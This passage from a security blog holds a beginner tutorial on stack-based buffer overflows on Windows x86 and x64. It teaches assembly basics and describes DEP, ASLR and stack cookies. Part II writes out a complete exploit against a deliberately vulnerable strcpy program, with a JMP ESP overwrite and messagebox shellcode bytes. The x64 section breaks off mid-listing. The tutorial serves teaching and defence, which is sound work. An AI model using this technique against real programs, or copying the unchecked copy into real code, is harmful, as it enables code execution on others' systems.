Nytro Security

Hello, world!

8 December 2017 at 09:16

I decided to start a blog.

I will try to write as much as possible, but this will not happen too often.

I will probably talk about my projects, NetRipper and Shellcode Compiler, reverse engineering or exploit development, but I will also try to cover web application security.

Previous blog posts

I previously wrote a few blog posts on securitycafe.ro:

About me

You can find more information about me on the About me page.

 

nytrosecurity


Stack Based Buffer Overflows on x86 (Windows) – Part I

9 December 2017 at 13:35

I wrote this article in Romanian in 2014, and I decided to translate it because it is a very detailed introduction to the exploitation of a “Stack Based Buffer Overflow” on x86 (32 bits) Windows.

Introduction

This tutorial is for beginners, but it requires at least some basic knowledge about C/C++ programming in order to understand the concepts.

The system that we will use and exploit the vulnerability on is Windows XP (32 bits – x86), for simplicity reasons: it has no DEP and no ASLR, protections that will be detailed later.

I would like to start with a short introduction to assembly (ASM) language. It will not be very detailed, but I will briefly describe the concepts required to understand what a “buffer overflow” vulnerability looks like and how it can be exploited. There are multiple types of buffer overflows; here we will discuss only the easiest one to understand, the stack based buffer overflow.

Introduction to ASM

In order to make sure all C/C++ developers will understand, I will first explain what happens to C/C++ code when it is compiled. Let’s take the following code:

#include <stdio.h>
int main() 
{ 
    puts("RST rullz"); 
    return 0; 
}

The compiler will translate the code into assembly language, which will later be translated into machine code that can be understood by the processor.

The ASM generated code will look similar to the following one:

PUSH OFFSET str_RST_rullz            ; /s = "RST rullz"
CALL DWORD PTR DS:[<&MSVCR100.puts>] ; \puts
ADD ESP,4
XOR EAX,EAX
RETN

It is not required to understand it at this time.

This ASM code will be assembled into machine code, such as the following:

68 F4200300    PUSH OFFSET str_RST_rullz            ; /s = "RST rullz"
FF15 A0200300  CALL DWORD PTR DS:[<&MSVCR100.puts>] ; \puts
83C4 04        ADD ESP,4
33C0           XOR EAX,EAX
C3             RETN

We can see a series of bytes: 0x68 0xF4 0x20 0x03 0x00 0xFF 0x15 0xA0 0x20 0x03 0x00 0x83 0xC4 0x04 0x33 0xC0 0xC3. On the right, we can see the instructions that were assembled to those bytes. In other words, the processor will read the bytes and process them as assembly code.

The processor does not understand the C/C++ variables. It has its own “variables”, more specifically, each processor has its own registers where it can store data.

A few of those registers are the following:

  • EAX, EBX, ECX, EDX, ESI, EDI – General purpose registers that store data.
  • EIP – Special register: it holds the address of the next instruction, as the processor executes the instructions one by one (such as the ASM code above). Let’s suppose the first instruction is available at the address 0x10000000, and that it has 3 bytes (an instruction can have one or more bytes). Initially, the value of this register is 0x10000000; after the processor executes the instruction, the EIP value will be 0x10000003.
  • ESP – Stack pointer: We will detail this later. For the moment it is enough to mention that a special data region, called the stack, will be used by the program, and this register holds the address of the top of the stack. We also have the EBP register, which holds the base of the current stack frame.

All these registers can store 4 bytes of data. The “E” comes from “Extended”, as 16-bit processors only had registers that could store 16 bits, such as AX, BX, CX, DX. On 64 bits, the registers can hold 64 bits: RAX, RBX etc.

A very important concept that needs to be understood when it comes to assembly language is the stack. The stack is a way to store data, piece by piece (in 4-byte pieces), where each new piece is placed on top of the last one. When data is removed from the stack, it is removed from the top, piece by piece. Or, as a teacher from college used to tell us, the stack is similar to a stack of plates: you can add a plate only at the top, and you remove them one by one from the top.

The stack is used at the processor level (on 32 bits) because:

  • local variables (inside functions) are placed on the stack
  • function parameters are also placed on the stack

There are also two things we need to be aware of when we work with ASM:

  • the processors are little endian: if you have a variable x = 0x11223344, it will be stored in memory as the bytes 0x44 0x33 0x22 0x11 (least significant byte first).
  • when we add a new element (a 4-byte piece of data) on the stack, the value of ESP becomes ESP-4! This is important, as the stack grows towards address 0.

We have two ASM instructions that we can use to work with the stack:

  • PUSH – Will place a 4 bytes value on the stack
  • POP – Will remove a 4 bytes value from the stack

For example, we can have the following stack (left is the address, right is the value):

24 - 1111
28 - 2222
32 - 3333

The addresses on the left get smaller as we add new items on the stack. Let’s add two new elements:

PUSH 5555
PUSH 6666

The stack will look like this:

16 - 6666 
20 - 5555 
24 - 1111 
28 - 2222 
32 - 3333

The easiest way to understand ESP, the register that holds the top of the stack, is to think of it as “how much space the stack has left for new elements”.

As we already discussed, PUSH and POP instructions work with the stack. The processor executes instructions in order to do its job and each instruction has its own role. Let’s see some other instructions:

  • MOV – Stores data to a register
  • ADD – Does an addition
  • SUB – Does a subtraction
  • CALL – Calls a function
  • RETN – Returns from a function
  • JMP – Jumps to an address
  • XOR – Binary operations, for example XOR EAX, EAX is the equivalent of EAX=0
  • INC – Increments the value by 1 (x++)
  • DEC – Decrements the value by 1 (x--)

There are a lot of other instructions, but these are the most common and easy to understand. Let’s see a few examples:

ADD EAX, 5     ; Adds the value 5 to the EAX register. It is EAX = EAX + 5
SUB EDX, 7     ; Subtracts 7 from the value of the EDX register. Such as EDX = EDX - 7
CALL puts      ; Calls the "puts" function
RETN           ; Returns from the function
JMP 0x11223344 ; Jumps to the specified address and execute the instructions from there
XOR EBX, EBX   ; The equivalent of EBX = 0
MOV ECX, 3     ; The equivalent of ECX = 3
INC ECX        ; The equivalent of ECX++
DEC ECX        ; The equivalent of ECX--

It should be pretty easy to understand. Now we can also understand what the processor does to print our message.

  • PUSH OFFSET str_RST_rullz – I replaced the longer mangled name with something simple. It is actually a pointer to the memory location where the “RST rullz” message is placed in memory. The instruction adds the address of our string on the stack. As a result, the value of the ESP register will be ESP – 4.
  • CALL DWORD PTR DS:[<&MSVCR100.puts>] – Calls the “puts” function from the “MSVCR100” (Microsoft Visual C Runtime v10) library, used by Visual Studio 2010. We will detail later how this instruction works, but before we call a function, we have to add the parameters on the stack (first instruction).
  • ADD ESP, 4 – Since the first instruction subtracted 4 bytes from the ESP register value, by doing this we restore those 4 bytes.
  • XOR EAX, EAX – This means EAX = 0. The value returned by a function will be stored in the EAX register (we have return 0 at the end of the code).
  • RETN – As we specified the return value with the previous instruction, we can safely return from the “main” function.

In order to better understand how a function call works, let’s take the following example:

#include <stdio.h>
int functie(int a, int b) 
{ 
    return a + b; 
}
int main() 
{ 
    functie(5, 6); 
    return 0; 
}

The “main” function will look in ASM code like this:

PUSH EBP
MOV EBP,ESP
PUSH 6
PUSH 5
CALL SimpleEX.functie
ADD ESP,8
XOR EAX,EAX
POP EBP
RETN

The “functie” function will look like this:

PUSH EBP
MOV EBP,ESP
MOV EAX,DWORD PTR SS:[EBP+8]
ADD EAX,DWORD PTR SS:[EBP+C]
POP EBP
RETN

Note: Visual Studio is smart enough to compute the result of the addition at compile time (5 + 6 = 11). For tests, you can completely deactivate the compiler optimizations from Properties > C/C++ > Optimization.

We can see some common instructions for both functions:

  • PUSH EBP – At the beginning of the functions
  • MOV EBP, ESP – At the beginning of the functions
  • POP EBP – At the end of the functions

Well, these instructions create “stack frames”. Their role is to separate the function calls on the stack, so that the EBP and ESP registers (the base and the top of the stack) delimit the stack memory area used by the currently called function. In other words, using these instructions, the EBP register holds the address where the data (local variables) used by the current function begins, and the ESP register holds the address where that data ends.

Let’s start with the function that does the addition.

  • MOV EAX,DWORD PTR SS:[EBP+8]
  • ADD EAX,DWORD PTR SS:[EBP+C]

Don’t be scared by the “DWORD PTR SS:[EBP+8]” stuff. As we previously discussed, between EBP and ESP we can find the data used by the function. In this case, this data represents the parameters of the function. The parameters are available on the stack and they are relative to the EBP address, at EBP+8 and EBP+0xC (0xC == 12).

Also, in ASM, the square brackets are used like “*” in C/C++ when it comes to pointers. As *p means “the value at the address p”, [EBP] means “the value at the address stored in the EBP register”. This is required because the EBP register contains a memory address as its value, and we need the value that is stored at that memory location.

Another thing to notice is that “DWORD” specifies that at the given address there is a 4-byte value. There are a few specifiers for the size of the data:

  • BYTE – 1 byte
  • WORD – 2 bytes
  • DWORD – 4 bytes (Double WORD)

The SS (Stack Segment), DS (Data Segment) or CS (Code segment) are other registers that identify different memory regions/segments: stack, data or code, and each of those locations has its own access rights: read, write or execute.

So what do those two instructions do? The first instruction places the value of the first parameter, “a”, in the EAX register. The second instruction adds the value of the second parameter, “b”, to the EAX register. So, in the end, the EAX register contains the value “a+b”, and this value will be returned by the function on RETN.

Let’s go now to the function that calls the addition function.

PUSH 6
PUSH 5
CALL SimpleEX.functie
ADD ESP,8

We remember that the function call is “functie(5, 6)”. Well, in order to call a function, we have to do the following:

  1. Put the parameters on the stack, from right to left, so first 6, second 5
  2. Call the function
  3. Clear the space allocated for the parameters (4 bytes * 2 parameters)

So, we place the two parameters on the stack (32 bits, or 4 bytes, each): first we push 6, followed by 5, we call the function and we clean the stack. In order to clean the stack, we just add 8 to the ESP value (the size of the two parameters) to restore it to the value before the function call. We previously discussed that it is possible to use the POP instruction to remove data from the stack, but in this case we would need two POP instructions. If we called a function with 100 parameters, we would need 100 POP instructions; a single “ADD ESP” instruction is easier and faster.

Note: This is important, but not for the purpose of this article: there are multiple ways to call a function, known as “calling conventions”. This method, which requires placing the parameters from right to left and cleaning the stack after the function call, is called “cdecl”. Other functions, such as the functions from the Windows operating system, called Windows API (Application Programming Interface), use a different calling convention called “stdcall”, which also requires placing the function parameters on the stack from right to left, but the cleaning of the stack is done inside the called function, not after the “CALL” instruction.

It is also important to understand that when we call a function using the “CALL” instruction, the address of the instruction following the “CALL” instruction is placed on the stack. For example:

00261013 | PUSH 6 ; /Arg2 = 00000006
00261015 | PUSH 5 ; |Arg1 = 00000005
00261017 | CALL SimpleEX.functie ; \functie
0026101C | ADD ESP,8

On the left we can see the memory addresses where the instructions are stored. Each PUSH instruction is 2 bytes long. The CALL instruction, available at the address 0x00261017, is 5 bytes long. So, the address following this instruction is 0x0026101C (which is 0x00261017 + 5). This is the address that will be pushed on the stack when the CALL instruction is executed.

Before the CALL instruction, the stack will look like this:

24 - 0x5
28 - 0x6
32 - 0x1337 ; Anything we have before the PUSH instructions

After the execution of the CALL instruction, the stack will look like this (the address values are simplified to be easier to understand):

20 - 0x0026101C ; The address of the instruction following the CALL instruction
                ; We need to save it in order to be able to know where to return after the function code is executed
                ; This is also called the "return address"
24 - 0x5
28 - 0x6
32 - 0x1337     ; Anything we have before the PUSH instructions

After the return address is placed on the stack, the execution continues with the function code. The first two instructions, called the function “prologue”, are used to create the stack frame for the called function:

PUSH EBP
MOV EBP,ESP

After the PUSH instruction, the stack will look like this:

16 - 32         ; The value of EBP before the function call
20 - 0x0026101C ; The return address, where we will go back at the RETN instruction
24 - 0x5
28 - 0x6
32 - 0x1337     ; Anything we have before the PUSH instructions

After the “MOV EBP, ESP” instruction, EBP will hold the address of the top of the stack. It is important to note that if the function used local variables, they would be placed on the stack.

Let’s modify the function to this:

int functie(int a, int b)
{
    int v1 = 3, v2 = 4;
    return a + b;
}

We now have two local variables, initialized with the values 3 and 4. The function will contain some new instructions:

SUB ESP,8                  ; Allocate space on the stack for the two variables, 4 bytes each
MOV DWORD PTR SS:[EBP-4],3 ; Initialize the first variable
MOV DWORD PTR SS:[EBP-8],4 ; Initialize the second variable

The stack will contain now:

08 - 4          ; Second variable
12 - 3          ; First variable
16 - 32         ; The value of EBP before the function call
20 - 0x0026101C ; The return address
24 - 0x5
28 - 0x6
32 - 0x1337     ; Anything we have before the PUSH instructions

As a conclusion, it is important to remember the following:

  • local function variables are placed on the stack
  • the return address is also placed on the stack

If you have any questions before proceeding with the stack based buffer overflow, make sure you find the answers in order to properly understand the subject.

You can continue this article with the second part.


Stack Based Buffer Overflows on x86 (Windows) – Part II

19 December 2017 at 23:17

In the first part of this article, we discussed the basics that we need in order to properly understand this type of vulnerability. As we went through how the compilation process works, what assembly looks like and how the stack works, we can go further and explore how a Stack Based Buffer Overflow vulnerability can be exploited.

Introduction

We previously discussed that the stack (during a function call) contains the following (in the order below, where the local variables are stored at the lowest address and the function parameters at the highest address):

  • Local variables of the function (for example 20 bytes)
  • Previous EBP value (to create the stack frame, saved with PUSH EBP)
  • Return address (placed on the stack by the CALL instruction)
  • Parameters of the function (placed on the stack using PUSH instructions)

If you understand those things, it is easy to understand the Stack Based Buffer Overflow vulnerability. Let’s take the following example: we have a function that is called from the “main” function:

#define _CRT_SECURE_NO_WARNINGS

#include "stdafx.h"
#include <stdio.h> 
#include <string.h>

// Function that displays the name 
void Display(char *p_pcName) 
{ 
    // Buffer (local variable) that will store the name 
    char buffer[20]; 
 
    // We copy the name in buffer 
    strcpy(buffer, p_pcName); 
 
    // Display the name 
    printf("Hello: %s", buffer); 
}

// Main function
int main() 
{ 
    Display("111122223333");
}

The program is very simple: it calls the “Display” function with the specified parameter.

We can see the problem here:

char buffer[20];
strcpy(buffer, p_pcName);

We have a local variable, buffer, which can store up to 20 bytes.

It is important to note that “char buffer[20]” is different from “char *buffer=(char*)malloc(20)” or “char *buffer=new char[20]”. Our version specifies a local variable of 20 bytes allocated directly on the stack. The other two versions dynamically allocate the space for the buffer, but that data is stored in a different memory region called the “HEAP”, not on the stack. By the way, there are also “Heap Based Buffer Overflows”, but they are more complicated.

Having a local variable that can store 20 bytes on the stack, we copy the string received as a parameter into that memory location. What happens if the length of that string is more than 20? We have a “buffer overflow”. The name “Stack Based Buffer Overflow” comes from the fact that the buffer is stored on the stack.

Let’s see how the code is compiled. Please note that if you use a modern version of Visual Studio, you might get a totally different result. In order to keep everything simple, we should remove from the project settings all optimizations, security features and functionalities that we don’t need.

Below is the compiled code of the main function:

000E1030 | 55             | push ebp            | Save previous EBP
000E1031 | 8B EC          | mov ebp,esp         | Create stack frame 
000E1033 | 68 0C 30 0E 00 | push sbof.E300C     | "111122223333"
000E1038 | E8 C3 FF FF FF | call <sbof.Display> | Call the function
000E103D | 83 C4 04       | add esp,4           | Clean the stack
000E1040 | 33 C0          | xor eax,eax         | eax = 0
000E1042 | 5D             | pop ebp             | Remove stack frame
000E1043 | C3             | ret                 | Return

As you can see, everything is as expected: there is only a PUSH for the “111122223333” string parameter, a function call and the stack is cleaned.

000E1000 | 55             | push ebp                      | 
000E1001 | 8B EC          | mov ebp,esp                   |

000E1003 | 83 EC 14       | sub esp,14                    | Allocate space on the stack for the buffer

000E1006 | 8B 45 08       | mov eax,dword ptr ss:[ebp+8]  | Get in EAX the string parameter address
000E1009 | 50             | push eax                      | Place it on the stack (second parameter)
000E100A | 8D 4D EC       | lea ecx,dword ptr ss:[ebp-14] | Get in EAX the address of the "buffer"
000E100D | 51             | push ecx                      | Place it on the stack (first parameter)
000E100E | E8 06 0C 00 00 | call <sbof.strcpy>            | Call strcpy(buffer, p_pcName); 
000E1013 | 83 C4 08       | add esp,8                     | Clean the stack

000E1016 | 8D 55 EC       | lea edx,dword ptr ss:[ebp-14] | Get in EAX the address of the "buffer"
000E1019 | 52             | push edx                      | Place it on the stack (second parameter)
000E101A | 68 00 30 0E 00 | push sbof.E3000               | "Hello: %s" string
000E101F | E8 6C 00 00 00 | call <sbof.printf>            | Call printf("Hello: %s", buffer);
000E1024 | 83 C4 08       | add esp,8                     | Clean the stack

000E1027 | 8B E5          | mov esp,ebp                   |
000E1029 | 5D             | pop ebp                       |
000E102A | C3             | ret                           |

The function allocates space for 20 bytes (0x14 in hexadecimal) and calls two functions:

  1. strcpy – with two parameters: the buffer and our string (111122223333)
  2. printf – with two parameters: the “Hello: %s” string and our string (111122223333)

Let’s see how the stack will look AFTER the strcpy function call, so after “add esp, 8” instruction:

00B9FED0 | 31313131 | "1111"
00B9FED4 | 32323232 | "2222"
00B9FED8 | 33333333 | "3333"
00B9FEDC | 770F8600 | The buffer has 20 bytes allocated, but there can be any data
00B9FEE0 | 000E12F7 | And those 8 bytes have junk data, as "111122223333" has 12 bytes and we allocated 20

00B9FEE4 | 00B9FEF0 | EBP saved on Display function first instruction
00B9FEE8 | 000E103D | Return address, the instruction after "call Display"
00B9FEEC | 000E300C | "111122223333" parameter for Display function
00B9FEF0 | 00B9FF38 | Previous EBP, from main function

As you can see, the first 20 bytes (the first 5 lines) represent the content of the “buffer”. We specified a string of 12 bytes (“111122223333”) and the rest of the buffer contains junk data (it is not initialized with NULLs). However, please note that after “3333”, we have the following data: 770F8600. The last byte is a NULL byte, the string terminator added by the “strcpy” function.

Now we can ask the question: “What will happen if the string parameter is longer than 20 bytes”? As you can probably guess, the answer is “We get a stack based buffer overflow”.

Exploitation

Let’s get back to the stack and see what we have there:

  1. The “buffer” (20 bytes)
  2. The Display function’s EBP
  3. The Return Address
  4. The parameter (the string)

What can go wrong? Let’s remember what happens when a function returns (on the RETN instruction): the execution continues from the “Return Address”. So, if we overflow the stack and overwrite the “Return Address” with something else… we can control the execution of the program!

This is what will happen if we use a string parameter of 28 bytes, instead of the maximum of 20.

We will modify the call “Display(“111122223333”);” to “Display(“1111222233334444555566667777”);“. The stack will look like this:

00B9FED0 | 31313131 | "1111"
00B9FED4 | 32323232 | "2222"
00B9FED8 | 33333333 | "3333"
00B9FEDC | 34343434 | "4444"
00B9FEE0 | 35353535 | "5555"

00B9FEE4 | 36363636 | "6666" - EBP saved on Display function first instruction
00B9FEE8 | 37373737 | "7777" - Return address, the instruction after "call Display"
00B9FEEC | 000E300C | "111122223333" parameter for Display function
00B9FEF0 | 00B9FF38 | Previous EBP, from main function

This means that when the execution of the “Display” function finishes (at the RETN instruction), the execution will jump to the address 0x37373737. So, in conclusion, the EIP value will be 0x37373737, a value that we control.

After the RETN instruction, the return address will be removed from the stack. This means that the top of the stack, the ESP register, will point to the address 0x00B9FEEC. We can see that if we use a string larger than 28 bytes (20 bytes buffer + 4 bytes saved EBP + 4 bytes return address), we will keep overwriting data on the stack. Since the ESP value will point to something that we control, how can we easily execute arbitrary code?

There are two things we control:

  1. The return address (EIP)
  2. The data at the top of the stack (ESP)

The easiest solution is to find a “JMP ESP” instruction. For example, let’s assume that the code of our program, or one of its DLLs, has a JMP ESP instruction at the address 0x12345678. What we will do is replace the return address with the address of this instruction (0x12345678) instead of “0x37373737”, and we can redirect the execution of the program to the top of the stack, where we can place any code and do whatever we want with the program!

Let’s open the program in x64dbg, an open-source debugger. A debugger is a program that allows you to open an executable and step through its instructions, letting you see at runtime the contents of the memory and the register values. It is a powerful tool with multiple features. Looking at the top of the SBOF.exe program, we can see our two functions. Below is a screenshot.

x64 example

Click each “PUSH EBP” instruction at the beginning of the functions and press F2. This places a breakpoint, so when you run the program in the debugger, it will stop at those instructions. You can also use F7 to step into each instruction, or F8 to step over: on a CALL instruction, F8 jumps over the function call instead of digging into it. Pressing F9 runs the program, and the debugger stops at the selected breakpoints, or if some error happens. It is very useful to play around with the debugger to see how powerful its features are.

Now, in order to keep the things simple, we will modify the code to contain the “JMP ESP” instruction. We will add the following function:

// Function that does nothing, it just contains a JMP ESP
void Nothing()
{
    __asm
    {
        jmp esp;
    }
}

As you can see in the debugger, the program also contains some other instructions, and it uses DLLs (such as kernel32.dll, ntdll.dll) which also contain a lot of code. We can search all this code for a JMP ESP instruction. Right click, go to “Search for” > “All Modules” > “Command”, type “jmp esp” and press OK.

x64 search jmp

In our case, with the new function that contains the “JMP ESP” instruction, we can find it at the following address:

01371033 | FF E4 | jmp esp |

x64 jmp esp

Please note that you might get totally different addresses, since modern operating systems, for security reasons, randomize the memory addresses; you will find more details later in this article.

So, in order to create a working proof of concept, we will have to build the following string:

  1. First 20 bytes will be the buffer
  2. Second 4 bytes will overwrite the saved EBP
  3. Following 4 bytes will be 0x01371033 – the address of the JMP ESP instruction
  4. The next bytes will represent the code we want to execute

So, let’s change the main function to the following:

int main() 
{ 
    Display("111122223333444455556666\x33\x10\x37\x01\xcc\xcc\xcc\xcc");
}

As you can see, we have the 0x01371033 address in our string, but in reverse order! This is because data is stored as “little endian” in memory, as we discussed in the first part of the article. The following “CC” bytes represent the “INT 3” instruction, an instruction that pauses the debugger as if a breakpoint had been set.

We can replace this with a shellcode. A shellcode is a special piece of code, most of the time written in Assembly, that works directly once assembled. Normal machine code would not work: its strings, for example, are placed in different memory regions, and the code knows the addresses of the functions it calls. In a shellcode, the strings are placed in the same place as the code, and the shellcode finds the addresses of the functions by itself. If you want to know in detail how a shellcode works on Windows and how you can write one manually, I recommend the following articles:

  1. Introduction to Windows shellcode development – Part 1
  2. Introduction to Windows shellcode development – Part 2
  3. Introduction to Windows shellcode development – Part 3

In order to keep things simple, we will use an existing shellcode. We can use this one: User32-free Messagebox Shellcode for any Windows version.

We will modify the main function to include this code. It will look like this:

int main() 
{ 
    Display(
        "111122223333444455556666\x33\x10\x37\x01"
        "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
        "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
        "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
        "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
        "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
        "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
        "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
        "\x49\x0b\x31\xc0\x51\x50\xff\xd7"
    );
}

As you can see, we have:

  1. Some random data
  2. Followed by the “JMP ESP” address
  3. The shellcode we copied from the above link

Please note that all this data must not contain a NULL byte. As the vulnerable call is a call to the “strcpy” function, “strcpy” will stop copying when it encounters the first NULL byte, and we would not have all the data copied.

Now, when we execute this program, this will happen:

x64 shellcode ok

We exploited it! This is the result of the copied shellcode. We managed to execute arbitrary code, code that we supplied and got full access to the execution of the program.

Now, you might think this is not a useful example. Of course it is not; it is for educational purposes. A program might get the string from the command line, or from the network, and the same thing might happen. Here are some common cases where this vulnerability might be present:

  • Getting data from the command line
  • Parsing a document (such as XML, HTML, PDF)
  • Reading data from the network (such as an FTP server or HTTP server)

Protection mechanisms

There are a few protections built to protect against this type of attack. All modern compilers and operating systems should have them.

DEP – Data Execution Prevention – is a protection mechanism that works at both the hardware level (NX bit – “No eXecute”) and the software level, and it does not allow the execution of code from memory regions that do not have the “execute” permission. A memory page can have “read”, “write” and/or “execute” permissions. For example, a memory region containing data, such as strings, can have “read” or “read-write” permissions, and a memory region containing code will have “read-execute” permissions. The stack, with read-write permissions, is a memory region from which it should not be possible to execute code. However, without DEP, this is possible, and DEP will protect against the execution of code from the stack. As you can probably understand, our shellcode was executed from the stack, so this protection would block our attack. It can be enabled in the compiler from “Configuration Properties” > “Linker” > “Advanced” > “Data Execution Prevention (DEP)”.

ASLR – Address Space Layout Randomization, which was introduced in Windows Vista and is the reason why it is easier to understand this vulnerability on Windows XP, is another protection mechanism against this type of attack. As we discussed, the DLLs and the executable can contain useful instructions, such as “JMP ESP”, that attackers can use. Before ASLR, the executable and the DLLs were always loaded in memory at the same addresses. For example, the SBOF.exe code would always start at 0x10002000 and kernel32.dll would always be loaded at some fixed address. This means that attackers can rely on the instructions from those binaries. But with ASLR, all modules, and also the stack and the heap memory, are loaded at random addresses. This way, we can find the address of a JMP ESP instruction, but it will not work on another machine, as the address will be different (randomly generated), since the module containing the instruction was loaded at a different memory address. It is possible to activate this feature from “Configuration Properties” > “Linker” > “Advanced” > “Randomized Base Address”.

Stack Cookies – This is another protection mechanism, built specifically against this type of attack, and it is offered by the compiler. It works by placing a random value, called a “stack cookie”, at the beginning of a function, between the local variables of the function (such as our buffer) and the saved return address. A stack based buffer overflow overwrites the data following the buffer, so it will also overwrite this random value. Before the “RETN” instruction, this protection checks the value of the randomly generated stack cookie. If a stack based buffer overflow occurred, the value will have changed, the verification will fail, and the program will forcibly stop execution, so the shellcode will not be executed. This protection can be configured from “Configuration Properties” > “C/C++” > “Code Generation” > “Security Check”.

Conclusion

Even if this type of vulnerability is not difficult to understand, the main difficulty is learning a few prerequisites, such as Assembly language and how programs work under the hood. Due to the existing protection mechanisms, real-life exploitation of this type of attack is much more difficult. However, there are a few tricks that can be used in certain situations to bypass some of the protections (if others are not present), but this is not the purpose of this article.

My suggestion, in order to properly understand this vulnerability, would be to compile a program like this, disable all protections and see what happens. You can modify the size of the buffer, but the most important thing is to go instruction by instruction and understand everything in detail. You can download the source code for the above example from here.

If you have any questions, please leave a comment here or use the contact email.

nytrosecurity

Stack Based Buffer Overflows on x64 (Windows)

24 January 2018 at 19:25

The previous two blog posts describe how a Stack Based Buffer Overflow vulnerability works on x86 (32 bits) Windows. In the first part, you can find a short introduction to x86 Assembly and how the stack works, and in the second part you can understand this vulnerability and find out how to exploit it.

This article will present a similar approach in order to understand how it is possible to exploit this vulnerability on x64 (64 bits) Windows. The first part will cover the differences in the Assembly code between x86 and x64 and the different function calling convention, and the second part will detail how these vulnerabilities can be exploited.

ASM for x64

There are multiple differences in Assembly that need to be understood in order to proceed. Here we will talk about the most important changes between x86 and x64 related to what we are going to do.

First of all, the registers are now the following:

  • The general purpose registers are the following: RAX, RBX, RCX, RDX, RSI, RDI, RBP and RSP. They are now 64 bits (8 bytes) instead of 32 bits (4 bytes).
  • EAX, EBX, ECX, EDX, ESI, EDI, EBP and ESP represent the lower 4 bytes of the previously mentioned registers. They hold 32 bits of data.
  • There are a few new registers: R8, R9, R10, R11, R12, R13, R14 and R15, also holding 64 bits.
  • It is possible to use R8D, R9D etc. in order to access their lower 4 bytes, as you can do with EAX, EBX etc.
  • Pushing and popping data on the stack will use 64 bits instead of 32 bits.

Calling convention

Another important difference is the way functions are called, the calling convention.

Here are the most important things we need to know:

  • The first 4 parameters are not placed on the stack: they are passed in the RCX, RDX, R8 and R9 registers.
  • If there are more than 4 parameters, the remaining parameters are placed on the stack (the fifth argument at the lowest address, just above the shadow space).
  • Similar to x86, the return value will be available in the RAX register.
  • The function caller will allocate stack space for the arguments passed in registers (called “shadow space” or “home space”). Even if the parameters are placed in registers when a function is called, if the called function needs to modify those registers, it will need some space to store their values, and this space is the stack. The function caller has to allocate this space before the function call and deallocate it afterwards. The caller should allocate at least 32 bytes (for the 4 registers), even if they are not all used.
  • The stack has to be 16 bytes aligned before any call instruction. Some functions might allocate 40 (0x28) bytes on the stack for this purpose: 32 bytes for the 4 registers and 8 bytes to restore the alignment, since the return RIP address pushed by the call misaligns it. You can find more details here.
  • Some registers are volatile and others are nonvolatile. This means that if we set some values into a register and call some function (e.g. a Windows API), a volatile register will probably change, while nonvolatile registers will preserve their values.

More details about calling convention on Windows can be found here.

Function calling example

Let’s take a simple example in order to understand those things. Below is a function that does a simple addition, and it is called from main.

#include "stdafx.h"

int Add(long x, int y)
{
    int z = x + y;
    return z;
}

int main()
{
    Add(3, 4);
    return 0;
}

Here is a possible output, after disabling all optimisations and security features.

Main function:

sub rsp,28
mov edx,4
mov ecx,3
call <consolex64.Add>
xor eax,eax
add rsp,28
ret

We can see the following:

  1. sub rsp,28 – This will allocate 0x28 (40) bytes on the stack, as we previously discussed: 32 bytes for the register arguments and 8 bytes for alignment.
  2. mov edx,4 – This will place in EDX register the second parameter. Since the number is small, there is no need to use RDX, the result is the same.
  3. mov ecx,3 – The value of the first argument is placed in the ECX register.
  4. call <consolex64.Add> – Call the “Add” function.
  5. xor eax,eax – Set EAX (or RAX) to 0, as it will be the return value of main.
  6. add rsp,28 – Clears the allocated stack space.
  7. ret – Return from main.

Add function:

mov dword ptr ss:[rsp+10],edx
mov dword ptr ss:[rsp+8],ecx
sub rsp,18
mov eax,dword ptr ss:[rsp+28]
mov ecx,dword ptr ss:[rsp+20]
add ecx,eax
mov eax,ecx
mov dword ptr ss:[rsp],eax
mov eax,dword ptr ss:[rsp]
add rsp,18
ret

Let’s see how this function works:

  1. mov dword ptr ss:[rsp+10],edx – As we know, the arguments are passed in the ECX and EDX registers. But what if the function needs to use those registers? (Note, however, that some registers must be preserved across a function call; these registers are the following: RBX, RBP, RDI, RSI, R12, R13, R14 and R15.) In this case, the function will use the “shadow space” (“home space”) allocated by the function caller. With this instruction, the function saves the second argument (the value 4) from the EDX register into the shadow space.
  2. mov dword ptr ss:[rsp+8],ecx – Similar to the previous instruction, this one saves on the stack the first argument (the value 3) from the ECX register.
  3. sub rsp,18 – Allocate 0x18 (24) bytes on the stack. This function does not call any other function, so it is not required to allocate at least 32 bytes. Also, since it does not call other functions, it is not required to align the stack to 16 bytes. I am not sure why it allocates 24 bytes; it looks like the “local variables area” on the stack has to be aligned to 16 bytes and the other 8 bytes might be used for the stack alignment (as previously mentioned).
  4. mov eax,dword ptr ss:[rsp+28] – Will place in EAX register the value of the second parameter (value 4).
  5. mov ecx,dword ptr ss:[rsp+20] – Will place in ECX register the value of the first parameter (value 3).
  6. add ecx,eax – Will add to ECX the value of the EAX register, so ECX will become 7.
  7. mov eax,ecx – Will save the same value (the sum) into EAX register.
  8. mov dword ptr ss:[rsp],eax and mov eax,dword ptr ss:[rsp] – These appear to be leftovers of the disabled optimizations; they don’t do anything useful.
  9. add rsp,18 – Cleanup the allocated stack space.
  10. ret – Return from the function.

Exploitation

Let’s see now how it would be possible to exploit a Stack Based Buffer Overflow on x64. The idea is similar to x86: we overwrite the stack until we overwrite the return address. At that point we can control program execution. This is the easiest example to understand this vulnerability.

We will have a simple program, such as this one:

void Copy(const char *p)
{
    char buffer[40];
    strcpy(buffer, p);
}

int main()
{
    Copy("Test");
    return 0;
}

We have a 40 bytes buffer and a function that will copy some string on that buffer.

This will be the assembly code of the main function:

sub rsp,28                       ; Allocate space on the stack
lea rcx,qword ptr ds:[1400021F0] ; Put in RCX the string ("test")
call <consolex64.Copy>           ; Call the Copy function
xor eax,eax                      ; EAX = 0, return value
add rsp,28                       ; Cleanup the stack space
ret                              ; return

And this will be the assembly code for the Copy function:

mov qword ptr ss:[rsp+8],rcx  ; Save the RCX on the stack
sub rsp,58                    ; Allocate space on the stack
mov rdx,qword ptr ss:[rsp+60] ; Put in RDX the "Test" string (second parameter to strcpy)
lea rcx,qword ptr ss:[rsp+20] ; Put in RCX the buffer (first parameter to strcpy)
